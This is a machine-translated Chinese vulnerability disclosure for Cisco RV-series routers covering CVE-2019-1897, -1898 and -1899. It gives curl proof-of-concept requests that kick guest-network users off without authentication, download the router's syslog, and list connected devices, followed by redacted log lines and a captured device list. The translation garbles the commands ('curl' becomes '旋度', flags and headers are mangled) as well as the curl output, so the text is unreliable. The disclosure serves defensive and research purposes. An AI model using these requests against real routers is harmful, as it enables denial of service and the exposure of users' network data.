cve - 2019 - 1897:客人网络拒绝服务
guest_logout.cgi上没有身份验证。一个未经身份验证的远程攻击者可以利用这个踢从客人网络用户。为了实现这个受害者的mac和ip地址需要知道(见下面的cve - 2019 - 1899)。一个概念证明如下:
旋度vv - d”submit_button = status_guestnet.asp&change_action = &submit_type = &gui_action = cip = 10.0.1.100&cmac = 10:08: B1: A0:82:29a”- h“内容类型:应用程序/ x-www-form-urlencoded”- x发布http://10.0.0.1/guest_logout.cgi
cve - 2019 - 1898:未经身份验证的访问通过HTTP Syslog
攻击者可以下载设备的syslog只是通过执行下面的命令:
curl http://10.0.0.1/_syslog.txt
syslog,通常只访问管理员的身份验证之后,包含有用的信息关于功能被启用,DHCP日志,PPTP日志,登录尝试、成功等。攻击者可以学习什么类型的设备连接到路由器,当。一些修订的例子:
2010-02-27 01:14:30 RV215W daemon.info httpd[477]:无效的用户名或密码x.x.x.x。2016-07-21 21:27:24 RV130W local2。注意pppd [1364]: . x.x.x本地IP地址。x 2016-07-21 21:27:24 RV130W local2。注意pppd [1364]: . x.x.x远程IP地址。x 2016-07-21 21:27:24 RV130W local2。注意pppd [1364]: . x.x.x主DNS地址。x 2016-07-21 21:27:24 RV130W local2。注意pppd[1364]:二级. x.x.x DNS地址。x 2019-03-01 19:09:40 RV110W kern.info LAN2WLAN:添加条目:哈希:32/33,问:6/6,指数:8,sip: . x.x.x。x,下降:. x.x.x。x, smac: xx: xx: xx: xx: xx: xx 2019-03-02 05:00:40 RV215W kern.info wl0.0: IEEE 802.11 STA xx: xx: xx: xx: xx: xx与BSSID xx: xx: xx: xx: xx: xx 2019-03-04 06:48:17 RV215W daemon.info udhcpd[21385]:收到请求从xx: xx: xx: xx: xx: xx 2019-03-04 06:48:17 RV215W daemon.info udhcpd [21385]: x.x.x.x发送ACK
cve - 2019 - 1899: Dislcosure连接设备的信息
一个未经身份验证的远程攻击者可以获得列表的所有设备连接到路由器。一个例子:
curl - d”submit_button = status_guestnet.asp&change_action = &submit_type = &gui_action = cip = 20.0.0.0&cmac = aa: aa: aa: aa: aa: aa”- h“内容类型:应用程序/ x-www-form-urlencoded”——不安全- x发布https://10.0.0.1/guest_logout。cgi | grep datalist | grep新% % % Xferd收到总平均速度时间时间时间总花离开当前Dload上传速度0 0 100 100 109 109 0 946 -:-:- - - - -:-:- - - - -:——:—947旋度:(52)空的回复从服务器100 7076 0 6967 100 109 19038 297 -:-:- - - - -:——:————:——:—19038 var datalist = new Array ();datalist[0] =新的AAA (”、“192.168.50.1”40: B0:76:2A: C2:14 ', ' 1 ', ' 0 ', ' WAN接口);datalist [1] = new AAA (ubuntu,‘10.0.0.102’,‘00:0C: 29:15:4C: FC’,‘0’,‘0’,以太局域网);datalist [2] = new AAA (‘TNS3791L’,‘10.0.0.101’, '交流:87:A3:31:51: CA ', ' 0 ', ' 0 ', '以太局域网');